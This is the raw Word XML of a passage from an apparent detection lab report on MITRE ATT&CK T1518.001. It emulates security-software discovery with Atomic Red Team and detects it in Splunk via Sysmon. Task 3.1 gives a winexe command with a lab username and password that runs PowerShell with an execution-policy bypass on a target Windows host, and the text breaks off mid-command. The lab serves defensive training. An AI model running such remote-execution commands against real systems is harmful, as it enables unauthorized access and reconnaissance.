              <w:instrText xml:space="preserve"> PAGEREF _Toc193890131 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="604B3323" w14:textId="4B561C14">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890132">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.8 Strategic Improvements</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890132 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="3FF5AD1E" w14:textId="0EF958C6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890133">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.Submission details</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890133 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="4EFF24D9" w14:textId="23088DEE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890134">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.Conclusion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890134 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="7288B415" w:rsidP="76BE3725" w:rsidRDefault="7288B415" w14:paraId="4CB1B83E" w14:textId="2D358794">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7920"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
      <w:sdtEndPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:sdtEndPr>
    </w:sdt>
    <w:p w:rsidR="00600D56" w:rsidP="76BE3725" w:rsidRDefault="00600D56" w14:paraId="6F41AE0A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00F62E6B" w:rsidR="00637646" w:rsidP="76BE3725" w:rsidRDefault="7288B415" w14:paraId="513DB13E" w14:textId="0C1C8541">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890116" w:id="0"/>
      <w:r w:rsidRPr="76BE3725">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="76BE3725" w:rsidR="06482D2A">
        <w:t>Prerequisites</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00600D56" w:rsidP="76BE3725" w:rsidRDefault="00600D56" w14:paraId="238882B6" w14:textId="470B4E32">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="1FFCC5D5" w14:textId="1CF88E48">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Req S00 S01 S02 S03 S04A S04B</w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>S08A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F62E6B" w:rsidR="00600D56" w:rsidP="7288B415" w:rsidRDefault="51481330" w14:paraId="17C3A05E" w14:textId="280371FD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890117" w:id="1"/>
      <w:r w:rsidRPr="76BE3725">
        <w:t>1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="76BE3725" w:rsidR="79C6680D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="76BE3725" w:rsidR="06482D2A">
        <w:t>Required Resources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidRPr="00F62E6B" w:rsidR="00637646" w:rsidP="76BE3725" w:rsidRDefault="00637646" w14:paraId="46C56F7D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="76BE3725">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="328FB67B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This Lab was run with a Splunk Enterprise instance running on an Ubuntu VM, a Kali VM for remote Atomic Red Team execution, and a victim Windows 10 AM with a Splunk Universal Forwarder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00637646" w:rsidP="76BE3725" w:rsidRDefault="00637646" w14:paraId="448D3E66" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="76BE3725">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F62E6B" w:rsidR="00637646" w:rsidP="76BE3725" w:rsidRDefault="06482D2A" w14:paraId="799FAB70" w14:textId="583D3527">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890118" w:id="2"/>
      <w:r w:rsidRPr="76BE3725">
        <w:t>2.Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="76BE3725">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600D56" w:rsidP="76BE3725" w:rsidRDefault="00600D56" w14:paraId="3F2A91BC" w14:textId="5F25B528">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00600D56" w:rsidP="0081210C" w:rsidRDefault="06482D2A" w14:paraId="513A3464" w14:textId="79C8F83F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rStyle w:val="eop"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890119" w:id="3"/>
      <w:r w:rsidRPr="76BE3725">
        <w:t>2.1. Lab Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="2345701F" w14:textId="2DE8900F">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:ind w:firstLine="360"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">In this lab, we examine the detection and analysis of the MITRE ATT&amp;CK technique T1518.001 — Security Software Discovery — executed remotely via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a Kali Linux host targeting a Windows 10 system. This technique simulates post-compromise reconnaissance wherein an adversary identifies installed security defenses to inform further attack steps. Using Atomic Red Team to emulate attacker behavior, we executed scripted PowerShell commands designed to enumerate antivirus software, firewall rules, and endpoint monitoring solutions such as Sysmon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600D56" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="65728B50" w14:textId="2EE943D8">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:ind w:firstLine="360"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The environment consisted of a Splunk Enterprise instance on Ubuntu, a victim Windows host running a Splunk Universal Forwarder, and a Kali Linux attack box. We monitored Sysmon logs ingested by Splunk to detect relevant command-line executions, including chained commands via cmd.exe, netsh.exe, sc.exe, and PowerShell-based AV discovery. This lab provides a practical framework for detecting reconnaissance activity using behavior-based telemetry and lays the groundwork for developing more comprehensive detection and response strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F62E6B" w:rsidR="001659D9" w:rsidP="76BE3725" w:rsidRDefault="06482D2A" w14:paraId="722BAB9D" w14:textId="4F5C7040">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890120" w:id="4"/>
      <w:r w:rsidRPr="76BE3725">
        <w:t>3.Tasks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="003566BB" w:rsidP="76BE3725" w:rsidRDefault="003566BB" w14:paraId="53C8355E" w14:textId="7B158DD9">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F5E5E" w:rsidP="0081210C" w:rsidRDefault="009F5E5E" w14:paraId="41DF2D60" w14:textId="105C0BDA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890121" w:id="5"/>
      <w:r w:rsidRPr="76BE3725">
        <w:t xml:space="preserve">3.1. </w:t>
      </w:r>
      <w:r w:rsidR="0081210C">
        <w:t>Execute ART Test Remotely</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="12394A8F" w14:textId="44F1EE9E">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:ind w:firstLine="360"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>In a hypothetical malicious actor scenario, having established a foothold in the target machine and placing files intent to run an initial Security Software Discovery technique with access still available we are ready to check the current defenses on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5BD1D28E" w14:textId="64E1C93C">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>To run the atomic T1518.001-1 remotely on the target machine at 192.168.0135. Execute the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="1C825069" w14:textId="6F3BD185">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -U victim%asdfzxc123 //192.168.0.135 "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass -Command Import-Module C:\\Users\\Public\\AtomicRedTeam\\invoke-atomicredteam\\Invoke-AtomicRedTeam.psd1; Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AtomicTest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> T1518.001-1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>TestNumbers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PathToAtomicsFolder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\\Users\\Public\\AtomicRedTeam\\atomics -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Confirm:\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">$false"  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="74E0A218" w14:textId="3D584C5B">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">For additional functionality you can check or get the prerequisites for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>other</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> atomics with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5F2B4BA4" w14:textId="6D219B86">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -U victim%asdfzxc123 //192.168.0.135 "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass -Command Import-Module C:\\Users\\Public\\AtomicRedTeam\\invoke-atomicredteam\\Invoke-AtomicRedTeam.psd1; Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
